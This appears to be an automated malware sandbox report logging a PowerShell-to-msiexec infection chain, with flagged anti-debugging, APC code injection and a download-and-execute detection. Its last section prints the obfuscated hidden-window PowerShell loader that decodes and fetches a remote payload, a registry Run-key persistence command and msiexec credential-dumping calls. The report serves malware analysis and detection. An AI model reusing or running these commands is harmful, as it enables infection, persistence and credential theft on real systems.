                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5226Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4684Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6030Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3746Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 360Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6204Thread sleep count: 3456 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1520Thread sleep count: 5679 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1520Thread sleep time: -17037000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 3456 delay: -5Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_228E10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,8_2_228E6580
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00418981 memset,GetSystemInfo,14_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: powershell.exe, 00000002.00000002.2241503546.000001DCC7D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWre%SystemRoot%\system32\mswsock.dlllGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN me
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006AF0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW67.155.139;
                Source: bhvC236.tmp.14.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_15-34016
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04B396D9 LdrInitializeThunk,LdrInitializeThunk,5_2_04B396D9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_228E2639
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E4AB4 mov eax, dword ptr fs:[00000030h]8_2_228E4AB4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E724E GetProcessHeap,8_2_228E724E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_228E2639
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_228E2B1C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_228E60E2

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Early bird code injection technique detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_5576.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6388, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4270000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp"Jump to behavior
